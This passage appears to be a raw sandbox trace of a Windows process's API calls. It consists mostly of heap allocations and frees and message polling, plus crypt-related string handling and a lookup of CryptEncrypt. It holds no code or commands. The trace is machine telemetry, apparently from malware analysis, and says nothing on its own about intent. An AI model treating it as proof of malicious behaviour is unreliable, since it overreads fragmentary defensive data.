hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0158.327] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0158.327] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.327] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.327] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0158.328] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.328] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.328] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.328] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0158.328] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0158.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b058 [0158.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0158.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.329] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0158.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0158.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0158.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0158.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0158.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0158.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0158.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe652) returned 0xa104b0 [0158.334] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa104b0 | out: hHeap=0x8a0000) returned 1 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0158.335] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0158.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.335] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.336] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.337] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.337] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.338] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.339] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0158.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd) returned 0x9bd840 [0158.339] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x9bd840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0158.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.340] GetProcAddress (hModule=0x74f20000, lpProcName="CryptEncrypt") returned 0x74f4779b [0158.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.340] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0158.340] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0158.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0158.341] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0158.341] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 